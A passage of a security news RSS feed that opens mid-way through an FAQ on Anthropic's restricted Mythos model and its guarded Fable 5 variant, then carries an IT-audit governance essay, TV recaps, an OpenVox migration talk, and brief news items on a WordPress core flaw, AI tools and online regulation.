<p class="wp-block-paragraph">Anthropic said it was restricting the more widespread availability of the frontier AI model because its capabilities might easily be misused by attackers.</p>



<p class="wp-block-paragraph">In June the technology was released to an <a href="https://www.csoonline.com/article/4180265/anthropic-grants-project-glasswing-access-to-150-more-companies-with-a-focus-on-critical-infrastructure.html">additional 150 organizations</a>. All Mythos partners are required to accept a 30-day data retention policy for safety monitoring.</p>



<p class="wp-block-paragraph">After the availability of Mythos forced the <a href="https://www.csoonline.com/article/4166824/anthropic-mythos-spurs-white-house-to-weigh-pre-release-reviews-for-high-risk-ai-models.html">Trump administration to reconsider its “hands off” approach to AI oversight</a>, the US government applied export controls to Claude Fable 5 and Claude Mythos 5 on June 15. The restrictions — which were supposed to block access to foreign nationals both inside and outside the US — were lifted on June 30.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">4.</span>
<h2 class="wp-block-heading">What is Claude Fable?</h2>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p class="wp-block-paragraph">For broader use, Anthropic is offering <a href="https://www.csoonline.com/article/4183094/anthropic-releases-mythos-class-fable-5-model-with-safeguards-for-cyber-risks.html">Claude Fable 5</a>, which is based on the same underlying technology but comes with strict guardrails that limit operations in “risky” cybersecurity domains. Flagged queries are automatically routed to the earlier and less capable Opus 4.8 large language model (LLM) instead.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">5.</span>
<h2 class="wp-block-heading">How are Anthropic’s security vendor partners using access to Mythos?</h2>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p class="wp-block-paragraph">Cisco, one of Anthropic’s Project Glasswing partners, <a href="https://blogs.cisco.com/ai/announcing-foundry-security-spec">open-sourced its Foundry Security Spec</a>, a model-agnostic “harness” for security testing, so that other vendors and enterprise security defenders could build similar workflows without starting from scratch.</p>



<p class="wp-block-paragraph">During a recent web conference, representatives from Cisco argued that defenders can use AI to identify, confirm, and resolve security issues at much greater speed and scale. Older vulnerability remediation models based on “find one issue, patch one issue” are no longer adequate because attackers are using AI moving to accelerate the path from vulnerability discovery to exploitation.</p>



<p class="wp-block-paragraph">Cisco has been using AI internally to scan 1.8 billion lines of code across its whole product portfolio.</p>



<p class="wp-block-paragraph">Smaller businesses do not need access to restricted AI models to improve security and more can be achieved in smaller shops by improving security fundamentals such as authentication, segmentation, zero trust, and prioritizing the remediation of actively exploited vulnerabilities, according to Cisco.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">6.</span>
<h2 class="wp-block-heading">Do other AI vendors offer anything comparable to Claude Mythos?</h2>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p class="wp-block-paragraph">Mythos is the most prominent example of frontier AI models that can automate zero-day discovery at a scale and speed far beyond the capability of human teams.</p>



<p class="wp-block-paragraph">Several other vendors have frontier AI models aimed towards high-capability, security-oriented operations while others have capable open models that might easily be applied to cybersecurity research.</p>



<p class="wp-block-paragraph">As a result, Claude Mythos is far from the only game in town.</p>



<p class="wp-block-paragraph">For example, OpenAI’s GPT-5.4-Cyber (and <a href="https://openai.com/index/gpt-5-5-with-trusted-access-for-cyber/">GPT-5.5</a>) has applications in vulnerability analysis and discovery as well as malware analysis and threat modelling. Security vendors, enterprises, and researchers can gain access to the technology through OpenAI’s Trusted Access for Cyber (TAC) scheme.</p>



<p class="wp-block-paragraph">Chinese cybersecurity firm <a href="https://www.reuters.com/legal/litigation/chinas-360-says-it-has-developed-tools-match-anthropics-mythos-2026-06-24/">360 Security Technology has developed Tulongfeng</a>, described as a domestic answer to Anthropic’s Mythos.</p>



<p class="wp-block-paragraph">High performance open models — including DeepSeek V3.2 and Llama 4 — can be run privately on GPU infrastructure and applied to cybersecurity research. Fugu from Japanese vendor Sakana AI offers another option in this category.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">7.</span>
<h2 class="wp-block-heading">What do cybersecurity critics say about Claude Mythos?</h2>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p class="wp-block-paragraph">Infosecurity critics note that while Claude Mythos is unquestionably advanced, marketing claims that it is reliably breaking production systems overstate its capabilities.</p>



<p class="wp-block-paragraph">Security professionals are complaining through <a href="https://www.youtube.com/watch?v=mx0CpTp3Q4Y">podcasts</a> and elsewhere about the overly sensitive guardrails in Claude Fable that downgrade to Opus 4.8 upon requests to summarize a security-related blog post or even spell the word “exploit” much less tackle any everyday information security task.</p>



<p class="wp-block-paragraph">Other experts warn that false positives are likely to be an issue for cybersecurity research using frontier AI models.</p>



<p class="wp-block-paragraph">The wider criticism is that finding more vulnerabilities faster fails to address the bigger problem of reliability fixing security bugs or non-technical attack paths such as social engineering.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">8.</span>
<h2 class="wp-block-heading">How should enterprise CISOs respond to the development of Mythos?</h2>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p class="wp-block-paragraph">Western intelligence agencies that form the <a href="https://www.ncsc.gov.uk/sites/default/files/2026-06/Five-Eyes-cyber-security-agencies-statement-ai-shift.pdf">Fives Eyes alliance issued a statement warning that frontier AI models such as Claude Mythos</a> are “fundamentally transforming both offensive and defensive cyber capabilities” in a scale of months rather than years.</p>



<p class="wp-block-paragraph">“While Al will help us improve cyber defence over time, it also accelerates the speed, scale, and sophistication of cyber threats,” the group, which includes the US National Security Agency and the UK’s National Cyber Security Centre, warns.</p>



<p class="wp-block-paragraph">Enterprises need to be using AI to strengthen defenses as part of broader plans to improve cybersecurity resilience.</p>



<p class="wp-block-paragraph">AI-based systems capable of mapping realistic attack paths faster than any human adversary are fast becoming a pervasive threat, while most organizations are nowhere near ready for what that means for their threat models, one expert warns.</p>



<p class="wp-block-paragraph">“We now have AI systems that can map realistic attack paths across software, vendors, and critical infrastructure faster than human adversaries can catalog them,” says Joe Hubback, partner and CISO at consultancy Elixirr and former McKinsey Partner. “And as Mythos-class capabilities are prepared for broad commercial release, that’s no longer a niche research problem, it’s something every organization will have to factor into its threat model.”</p>



<p class="wp-block-paragraph">An <a href="https://labs.cloudsecurityalliance.org/wp-content/uploads/2026/04/mythosready-20260413.pdf">AI safety paper from the Cloud Security Alliance</a> warns that AI has significantly compressed the time between vulnerability discovery and exploitation, outpacing traditional patch-and-react security models. Organizations should brace for ongoing waves of AI-discovered vulnerabilities from Project Glasswing and other sources.</p>



<p class="wp-block-paragraph">“The capabilities seen in Mythos will quickly become more widely available, dramatically increasing the number and frequency of complex, novel attacks organizations will face,” it warns.</p>



<p class="wp-block-paragraph">Enterprise security defenders need to shift to a “Mythos-ready” approach built around continuous vulnerability operations, faster prioritization, and improved incident response.</p>
</div>
</div></div>
</div>



<p class="wp-block-paragraph"><strong>See also:</strong></p>



<ul class="wp-block-list">
<li><a href="https://www.csoonline.com/article/4155342/what-anthropic-glasswing-reveals-about-the-future-of-vulnerability-discovery.html">What Anthropic Glasswing reveals about the future of vulnerability discovery</a></li>



<li><a href="https://www.csoonline.com/article/4158117/anthropics-mythos-signals-a-structural-cybersecurity-shift.html">Anthropic’s Mythos signals a structural cybersecurity shift</a></li>



<li><a href="https://www.csoonline.com/article/4180920/beware-the-son-of-mythos-security-experts-warn.html">Beware the ‘son of Mythos,’ security experts warn</a></li>



<li><a href="https://www.csoonline.com/article/4189600/mythos-is-a-signal-not-a-siren-what-frontier-ai-should-change-for-cisos.html">Mythos is a signal, not a siren: What frontier AI should change for CISOs</a></li>
</ul>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The audit trail CIOs need before the next cyber crisis]]></title>
<description><![CDATA[In one ransomware response I observed, the master operational dashboard remained green while the underlying environment told a very different story. It was a classic example of what we in the IT audit profession call the “watermelon effect”—green on the outside, red on the inside.



Beneath that...]]></description>
<link>https://tsecurity.de/de/3680143/it-security-nachrichten/the-audit-trail-cios-need-before-the-next-cyber-crisis/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680143/it-security-nachrichten/the-audit-trail-cios-need-before-the-next-cyber-crisis/</guid>
<pubDate>Mon, 20 Jul 2026 02:13:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">In one ransomware response I observed, the master operational dashboard remained green while the underlying environment told a very different story. It was a classic example of what we in the IT audit profession call the “watermelon effect”—green on the outside, red on the inside.</p>



<p class="wp-block-paragraph">Beneath that dashboard sat an unmapped web of legacy technical debt, undocumented service accounts and shadow cloud instances. For years, presenting a green dashboard to the audit committee could give technology leaders a false sense of comfort. If a catastrophic breach occurred, it was generally treated as an unpredictable operational tragedy, managed via cyber insurance, a carefully calibrated public relations pivot and perhaps a quiet executive transition.</p>



<p class="wp-block-paragraph">Today, that corporate shield is thinner than many technology leaders assume. For technology leaders in regulated or public-company environments, executive exposure is no longer only a theoretical debate. The regulatory environment has made plausible deniability much harder to sustain.</p>



<h2 class="wp-block-heading">The erosion of the corporate shield</h2>



<p class="wp-block-paragraph">With the application of the European Union’s <a href="https://www.eiopa.europa.eu/digital-operational-resilience-act-dora_en">Digital Operational Resilience Act (DORA)</a> for financial entities, alongside the broader <a href="https://digital-strategy.ec.europa.eu/en/policies/nis2-directive">NIS2 Directive</a> for essential and important entities, cybersecurity governance has become harder to separate from board-level oversight. DORA places ultimate responsibility for ICT risk management on the management body of financial entities, while NIS2 requires management bodies to approve and oversee cybersecurity risk-management measures. In the United States, the <a href="https://www.sec.gov/newsroom/press-releases/2023-139">U.S. Securities and Exchange Commission’s cybersecurity disclosure rules</a> require public companies to disclose material cyber incidents and describe their cyber risk management, strategy and governance in annual filings. The new burden is not simply to operate controls; it is to show, after the fact, that leadership decisions matched the risk evidence available at the time.</p>



<p class="wp-block-paragraph">The serious risk to a modern CIO is not simply the occurrence of a sophisticated security incident. The true danger is the inability to reconcile what leadership presented externally to investors, regulators and the board with what the internal evidence showed inside the environment.</p>



<p class="wp-block-paragraph">When a serious crisis breaks, you may find yourself surrounded by corporate defense counsel, regulatory investigators and outside forensic lawyers all asking variations of the same uncomfortable questions: What did you know, when did you discover it and what specific actions did you take next?</p>



<p class="wp-block-paragraph">When those questions are asked, a slide deck asserting that your security posture is “aligned with industry best practices” will not be enough. A post-incident review may recognize that sophisticated attacks occur. What creates greater exposure is evidence that known risks were ignored, understated or left outside structured governance. To survive that level of post-incident review, one of your strongest assets is a disciplined, independent evidence trail showing that risks were identified, challenged, escalated and acted on before the first indicator of compromise appeared.</p>



<h2 class="wp-block-heading">Why point-in-time comfort letters fail regulatory scrutiny</h2>



<p class="wp-block-paragraph">The reality we face is that legacy compliance evidence often falls short under regulatory scrutiny. For years, the annual SOC 2 Type II report or a standardized ISO 27001 certification was brandished by technology teams as the definitive proof of a functional control environment. I have sat in dozens of scoping meetings where an engineering director pointed to a freshly minted compliance report as if it were a complete defense against scrutiny.</p>



<p class="wp-block-paragraph">But a compliance report is a historical artifact—a retrospective evaluation of how specific controls operated during a defined window of time months in the past. It tells an investigator that on a random afternoon in Q2, your production change-management approvals conformed to a baseline policy. It says absolutely nothing about the configuration drift, unauthorized API keys or emergency patch bypasses that developers introduced the following weekend to hit a product release deadline.</p>



<p class="wp-block-paragraph">Modern regulators, boards and investors are no longer satisfied by historical comfort letters alone. Under contemporary frameworks, especially regimes focused on operational resilience, static compliance evidence is no longer enough. The expectation of due care has shifted from a passive state of compliance to an active state of continuous challenge. Increasingly, post-incident reviews look for evidence that leadership identified system vulnerabilities, formally escalated material deficiencies, evaluated systemic risk to the business and tracked remediation progress with measurable rigor.</p>



<p class="wp-block-paragraph">When an architecture fails, post-incident reviews often focus quickly on ownership, escalation and whether known risks were acted upon. If your defensive documentation consists entirely of static policy documents and green dashboards, you leave an evidentiary vacuum that can invite difficult questions about executive oversight. Post-incident reviews rarely turn on perfection. They turn on whether the organization can show a traceable chain of governance.</p>



<h2 class="wp-block-heading">5 non-negotiable artifacts for your executive evidence engine</h2>



<p class="wp-block-paragraph">This reality requires a complete reframing of your relationship with your IT audit department. Historically, this dynamic has been defined by friction. Technology leaders frequently view my peers and me as compliance traffic cops—bureaucrats who interrupt core engineering sprints to demand evidence samples, user access reviews and system configurations.</p>



<p class="wp-block-paragraph">It is time to view IT audit through a pragmatic lens: we are your independent evidence engine. We are one of the few corporate functions tasked with independently challenging your control environment, documenting where exceptions were escalated and showing how management responded. When an auditor identifies a control gap and partners with you to draft a management action plan, they are not creating a bureaucratic roadblock. They are helping you construct an evidence trail that can show risk was identified, escalated and acted upon.</p>



<p class="wp-block-paragraph">To transform your IT audit function into an effective executive shield, you must shift focus away from superficial check-the-box exercises and collaborate on specific artifacts. The most effective exercise you can run with your audit leadership is to flip the timeline completely and ask: if this program were reviewed six months from now, which evidence would show we governed the risk before it failed?</p>



<ol class="wp-block-list">
<li><strong>Board-facing risk registers with escalation history:</strong> A risk register that sits unreviewed on an intranet page for 12 months is not a management tool; to an investigator, it can look like evidence that known risks were not actively governed. Your material technology, cybersecurity and dependency risks must be centrally logged. More importantly, this artifact must contain a clear, chronological escalation history showing exactly when the risk was presented to leadership committees and the board, along with related minutes, decisions or follow-up actions.</li>



<li><strong>Granular risk acceptance records:</strong> You cannot remediate every vulnerability instantly. Business continuity, legacy software limitations and budgetary boundaries require you to accept certain operational exposures. When this occurs, ensure your risk acceptance records are airtight. A defensible record must document the specific technical variance, the precise financial or operational rationale for the delay, a definitive expiration date, explicit executive sign-off and the active compensating controls deployed to reduce the blast radius in the interim.</li>



<li><strong>Tabletop and operational simulation records:</strong> Independent frameworks such as <a href="https://www.isaca.org/digital-trust">ISACA’s Digital Trust Ecosystem Framework</a> can help structure this evidence, but boards and regulators will still look for proof that the testing actually happened. Your audit trail should contain comprehensive records of cyber incident, disaster recovery and third-party dependency simulations. These records must detail the scenario tested, the executive participants, the control failures identified during the drill and a formalized tracking schedule showing when those gaps were closed.</li>



<li><strong>AI governance inventories and data-flow mappings:</strong> The rapid deployment of generative AI tools across enterprise operations has created a massive blind spot for technology executives. In one audit, we found developers using an unapproved public large language model to accelerate debugging with sensitive internal code. To protect yourself, work with your audit team to build an active enterprise AI inventory that maps data lineage, identifies model business owners, documents risk classification approvals and demonstrates active technical monitoring for unauthorized data exfiltration.</li>



<li><strong>Synchronized disclosure-control handoffs:</strong> When a material security incident or system outage occurs, the clock begins ticking for regulatory reporting. Your incident response playbook must be technically linked to your corporate disclosure controls. The audit trail should show that a documented, synchronized handoff occurred between your technical response leaders, general counsel, chief financial officer and corporate communications team. This evidence helps show that your external statements match internal technical realities.</li>
</ol>



<p class="wp-block-paragraph">In the modern corporate ecosystem, technology leadership is no longer just an engineering challenge; it is an exercise in rigorous, evidence-based governance. The regulatory landscape has changed, and the expectation of continuous traceability cannot be avoided.</p>



<p class="wp-block-paragraph">Open and direct collaboration with your IT audit team will not prevent a zero-day exploit, an unexpected cloud outage or a critical third-party vendor failure. That is not the purpose of enterprise risk management.</p>



<p class="wp-block-paragraph">The true value is far more practical: when a serious incident puts your program under review, you will not be forced to defend your reputation with a feeling, an unverified assumption or a misleadingly green dashboard. Instead, you will have an independent record showing that risk was actively seen, appropriately challenged, properly escalated and responsibly managed. In today’s regulatory environment, that disciplined trail of evidence may be the difference between a failure that can be explained and one that begins to look negligent.</p>



<p class="wp-block-paragraph">.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[‘Agent Kim Reactivated’ Season 1, Episode 8 Recap: Kim Takes on One Final Mission]]></title>
<description><![CDATA[Agent Kim Reactivated Season 1, Episode 8 places Kim Do-hyeon inside another deadly operation after the authorities use his daughter’s safety to force him back into service.



Kim learns the truth about his imprisonment



Episode 8 begins with Kim trapped inside what appears to be a North Korea...]]></description>
<link>https://tsecurity.de/de/3680124/ios-mac-os/agent-kim-reactivated-season-1-episode-8-recap-kim-takes-on-one-final-mission/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680124/ios-mac-os/agent-kim-reactivated-season-1-episode-8-recap-kim-takes-on-one-final-mission/</guid>
<pubDate>Mon, 20 Jul 2026 01:24:34 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Agent Kim Reactivated Season 1, Episode 8 places Kim Do-hyeon inside another deadly operation after the authorities use his daughter’s safety to force him back into service.



Kim learns the truth about his imprisonment



Episode 8 begins with Kim trapped inside what appears to be a North Korean interrogation facility. Soldiers torture him for several days, but he refuses to reveal any information.



The situation changes when one of the interrogators threatens Min-ji. Kim immediately fights back, only to discover that the entire prison setup was a test organised by South Korean officials.



Mole Cricket explains that the authorities still need Kim’s skills. They offer him and Min-ji new identities, but Kim must first complete one final mission.



Kim agrees on two conditions. Min-ji must remain safe, while Han-su and Jin-cheol must be released. The officials accept his terms, giving Kim little choice but to return to the dangerous life he tried to leave behind.



What happened before Episode 8?



In Episode 7, Kim finally reunited with Min-ji after fighting through several groups trying to capture them. He also defeated Ju Gang-chan, who had threatened his daughter and attempted to recruit him.



Min-ji stopped Kim from killing Ju and forced him to seek an apology instead. Kim later prepared a final meal for his daughter before surrendering himself to the authorities.



The episode ended with Kim waking inside the prison, making it appear that he had been secretly transported to North Korea.



Kim protects a North Korean defector



Kim’s new mission involves protecting an important North Korean official seeking asylum in South Korea. The defector carries sensitive information that could influence negotiations between the two countries.



Kim takes the man to a safe house while Sang-a prepares for the next stage of the operation. However, Ju Gang-chan begins working with North Korean officials to capture the defector before he can reveal what he knows.



Armed attackers soon raid the safe house. Kim uses a decoy plan, sending part of his team through the woods while he escapes through another route with the defector.



Kim quickly realises that the attackers knew too much about the mission. Their timing and knowledge suggest that someone inside the SMD leaked the safe house location.



Episode 8 ending explained



Kim eventually meets Han-su and Jin-cheol, bringing the three former agents together again. Their reunion lasts only a few moments before Mole Cricket arrives with SMD forces.



Mole Cricket claims that Kim failed to complete his assignment. He then announces that Kim will be sent back to North Korea.



The cliffhanger raises several questions. Mole Cricket could be involved in the information leak, or he may be following orders from someone inside the government. Kim must now uncover the traitor while protecting the defector, Min-ji and his closest allies.



Episode 8 expands the story beyond Min-ji’s kidnapping and introduces a larger conflict involving political corruption, secret deals and betrayal inside the intelligence service.



Do you think Mole Cricket betrayed Kim, or is he hiding another part of the mission? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[‘House of the Dragon’ Season 3, Episode 5 Release Date and What to Expect]]></title>
<description><![CDATA[House of the Dragon Season 3, Episode 5 will arrive on Sunday, July 19, 2026, continuing the increasingly violent conflict between Rhaenyra Targaryen and the forces supporting Aegon II. Viewers in India can stream the episode early on Monday, July 20.



Episode 5 Release Details




US release d...]]></description>
<link>https://tsecurity.de/de/3679992/ios-mac-os/house-of-the-dragon-season-3-episode-5-release-date-and-what-to-expect/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679992/ios-mac-os/house-of-the-dragon-season-3-episode-5-release-date-and-what-to-expect/</guid>
<pubDate>Sun, 19 Jul 2026 23:09:10 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[House of the Dragon Season 3, Episode 5 will arrive on Sunday, July 19, 2026, continuing the increasingly violent conflict between Rhaenyra Targaryen and the forces supporting Aegon II. Viewers in India can stream the episode early on Monday, July 20.



Episode 5 Release Details




US release date: Sunday, July 19, 2026



US release time: 9 p.m. ET and 6 p.m. PT



India release date: Monday, July 20, 2026



India release time: Around 6:30 a.m. IST



Where to watch: HBO and HBO Max in supported regions



Genre: Fantasy, drama and action



Episode: Season 3, Episode 5



Runtime: HBO has not confirmed the official duration



Main cast: Emma D’Arcy, Matt Smith, Olivia Cooke, Ewan Mitchell, Tom Glynn-Carney, Sonoya Mizuno, Phoebe Campbell and James Norton




Season 3 contains eight episodes, with a new episode releasing every Sunday in the United States. The finale is currently scheduled for August 9, 2026.



Where Is the Story Heading?



Spoilers for House of the Dragon Season 3, Episode 4 ahead.



Episode 5 will continue the fallout from Daeron Targaryen’s disturbing transformation under Ormund Hightower. Ormund forced the young prince into committing his first murder, using Tessarion to kill Leo after a confrontation involving Hightower soldiers. The event showed how Ormund intends to shape Daeron into a weapon for the Greens.



Daeron now faces a growing conflict between his Targaryen identity and the Hightower family that raised him. His connection with Tessarion also makes him an important player in the war, especially as both sides prepare for larger battles around Tumbleton.



Daemon’s Secret Could Create More Trouble



Episode 4 also revealed that Daemon lied to Rhaenyra about killing Sheepstealer’s rider. The rider is his daughter Rhaena, who refused to abandon the wild dragon. Daemon instead killed a shepherd and presented the remains to Rhaenyra as proof that he had completed her order.



Episode 5 could place Daemon under greater pressure as Mysaria already suspects that he is hiding something. Rhaena’s bond with Sheepstealer also gives the Blacks another possible dragonrider, although her decision to claim the dragon could deepen the conflict within Rhaenyra’s court.



Meanwhile, Rhaenyra must handle political betrayal, financial problems and growing doubts about her leadership. With Daeron entering the war and Daemon keeping dangerous secrets, Episode 5 should move several major characters closer to direct confrontation.



What do you plan to watch when House of the Dragon Season 3, Episode 5 arrives? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Migrating to OpenVox at INFN Naples (voxconf2026)]]></title>
<description><![CDATA[Puppet has been in use at INFN Naples for several years, together with Foreman for lifecycle management. It is currently used to manage several hundred machines, both bare metal and virtual, across a heterogeneous infrastructure that includes Ceph and dCache storage systems, HTCondor clusters, an...]]></description>
<link>https://tsecurity.de/de/3679965/it-security-video/migrating-to-openvox-at-infn-naples-voxconf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679965/it-security-video/migrating-to-openvox-at-infn-naples-voxconf2026/</guid>
<pubDate>Sun, 19 Jul 2026 22:32:53 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Puppet has been in use at INFN Naples for several years, together with Foreman for lifecycle management. It is currently used to manage several hundred machines, both bare metal and virtual, across a heterogeneous infrastructure that includes Ceph and dCache storage systems, HTCondor clusters, an OpenStack private cloud, and a number of self-hosted services such as Greenbone and NetBox

A change in Perforce licensing policy forced us to look for an alternative solution, leading to the migration to OpenVox and to an active involvement with its community. The migration process can be divided into several sub-tasks:

    Migration of an all-in-one Puppet Server (OSP Server, PuppetDB, and Puppetboard) and the managed clients
    Migration of the Foreman server and its managed clients
    Migration of the supporting toolchain (Bolt, IDE integrations, and related tools)

Each of these areas presented distinct challenges and required different migration strategies, some of which are still ongoing.
Contributions and roadmap

The migration effort led us to contribute to upstream projects, most notably the puppet-openvoxdb module (now released) and a set of Foreman templates to provision clients with the OpenVox repository enabled (work in progress at the time of writing). Despite the strong community support and our efforts, some components of the infrastructure have not yet been migrated, most notably the Git-based workflow, which still relies on r10k.
about this event: https://c3voc.de]]></content:encoded>
</item>
<item>
<title><![CDATA[FAA and federal workers forced to install $1.4 million White House app containing Russian-built Elfsight code onto government-issued mobile devices]]></title>
<description><![CDATA[Official White House app faces scrutiny after researchers uncovered Russian-linked software origins, data concerns, and unanswered federal security approval questions.]]></description>
<link>https://tsecurity.de/de/3679784/it-nachrichten/faa-and-federal-workers-forced-to-install-14-million-white-house-app-containing-russian-built-elfsight-code-onto-government-issued-mobile-devices/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679784/it-nachrichten/faa-and-federal-workers-forced-to-install-14-million-white-house-app-containing-russian-built-elfsight-code-onto-government-issued-mobile-devices/</guid>
<pubDate>Sun, 19 Jul 2026 19:36:39 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Official White House app faces scrutiny after researchers uncovered Russian-linked software origins, data concerns, and unanswered federal security approval questions.]]></content:encoded>
</item>
<item>
<title><![CDATA[Genius Bar AI tools spark concerns over employee monitoring & evaluation]]></title>
<description><![CDATA[Apple is testing a new Genius Bar tool called Live Notes that transcribes and summarizes conversations with a customer, but employees are worried about how the tool might be used against them.Genius Bar employees may gain a new AI assistantArtificial intelligence has become a buzzword throughout ...]]></description>
<link>https://tsecurity.de/de/3679619/ios-mac-os/genius-bar-ai-tools-spark-concerns-over-employee-monitoring-evaluation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679619/ios-mac-os/genius-bar-ai-tools-spark-concerns-over-employee-monitoring-evaluation/</guid>
<pubDate>Sun, 19 Jul 2026 16:39:02 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple is testing a new Genius Bar tool called Live Notes that transcribes and summarizes conversations with a customer, but employees are worried about how the tool might be used against them.<br><br><div><img src="https://photos5.appleinsider.com/gallery/68287-143944-iPad-mini-7-4-xl.jpg" alt="Back of a gray Apple iPad with rear camera and Apple logo, set against a dark background featuring glowing neon loops in orange, yellow, blue, and pink" height="738"><br><span>Genius Bar employees may gain a new AI assistant</span></div><br>Artificial intelligence has become a buzzword throughout the tech industry from both the consumer and employee perspective. Employees of any kind at many companies have had to contend with mandatory AI tool use forced on them by the employer.<br><br>So far, reports haven't indicated Apple taking such a hardline route to AI tool use. However, the "Power On" newsletter from <em>Bloomberg</em> <a href="https://www.bloomberg.com/account/newsletters/power-on">shares that</a> Apple is testing a new tool called Live Notes for use in the Genius Bar.<br><br><br> <a href="https://appleinsider.com/articles/26/07/19/genius-bar-ai-tools-spark-concerns-over-employee-monitoring-evaluation?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244993?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Victoria announces new social media ‘demasking’ powers for accounts accused of vilification]]></title>
<description><![CDATA[New laws would give Vcat power to force social and AI platforms to identify anonymous users in move premier says will protect childrenGet our breaking news email, free app or daily news podcastSocial media companies could be forced to identify anonymous accounts accused of online vilification, un...]]></description>
<link>https://tsecurity.de/de/3678971/ai-nachrichten/victoria-announces-new-social-media-demasking-powers-for-accounts-accused-of-vilification/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678971/ai-nachrichten/victoria-announces-new-social-media-demasking-powers-for-accounts-accused-of-vilification/</guid>
<pubDate>Sun, 19 Jul 2026 08:18:27 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>New laws would give Vcat power to force social and AI platforms to identify anonymous users in move premier says will protect children</p><ul><li><p>Get our <a href="https://www.theguardian.com/email-newsletters?CMP=cvau_sfl">breaking news email</a>, <a href="https://app.adjust.com/w4u7jx3">free app</a> or <a href="https://www.theguardian.com/australia-news/series/full-story?CMP=cvau_sfl">daily news podcast</a></p></li></ul><p>Social media companies could be forced to identify anonymous accounts accused of online vilification, under new laws being proposed in Victoria.</p><p>The Victorian premier, Jacinta Allan, announced a suite of social media reforms on Sunday, saying families needed new ways to protect their children online.</p> <a href="https://www.theguardian.com/australia-news/2026/jul/19/victoria-proposes-social-media-account-identification-powers">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[New wp2shell WordPress Core Flaw Lets Unauthenticated Attackers Run Code]]></title>
<description><![CDATA[An anonymous HTTP request can run code on a WordPress site. The bug is in core, so a bare install with zero plugins is exploitable.

Every 6.9 and 7.0 site was in range until Friday, when WordPress shipped 6.9.5 and 7.0.2 and enabled what it calls forced updates through its auto-update system.

A...]]></description>
<link>https://tsecurity.de/de/3677094/it-security-nachrichten/new-wp2shell-wordpress-core-flaw-lets-unauthenticated-attackers-run-code/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677094/it-security-nachrichten/new-wp2shell-wordpress-core-flaw-lets-unauthenticated-attackers-run-code/</guid>
<pubDate>Fri, 17 Jul 2026 23:52:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An anonymous HTTP request can run code on a WordPress site. The bug is in core, so a bare install with zero plugins is exploitable.

Every 6.9 and 7.0 site was in range until Friday, when WordPress shipped 6.9.5 and 7.0.2 and enabled what it calls forced updates through its auto-update system.

Adam Kues at Assetnote, Searchlight Cyber's attack surface management arm, found the flaw and reported]]></content:encoded>
</item>
<item>
<title><![CDATA[Intuit scrapped its own AI agent architecture twice in four months. At VB Transform 2026, its AI VP called that the fast path]]></title>
<description><![CDATA[Intuit was an early pioneer in the usage of agentic AI, but its path to success has hardly been a straight line.At VB Transform 2026, Intuit VP of AI Nhung Ho described how the company rebuilt its agent architecture twice in the span of about four months, first moving from a fleet of specialist a...]]></description>
<link>https://tsecurity.de/de/3677037/it-nachrichten/intuit-scrapped-its-own-ai-agent-architecture-twice-in-four-months-at-vb-transform-2026-its-ai-vp-called-that-the-fast-path/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677037/it-nachrichten/intuit-scrapped-its-own-ai-agent-architecture-twice-in-four-months-at-vb-transform-2026-its-ai-vp-called-that-the-fast-path/</guid>
<pubDate>Fri, 17 Jul 2026 23:02:41 +0200</pubDate>
<category>📰 IT Nachrichten</category>
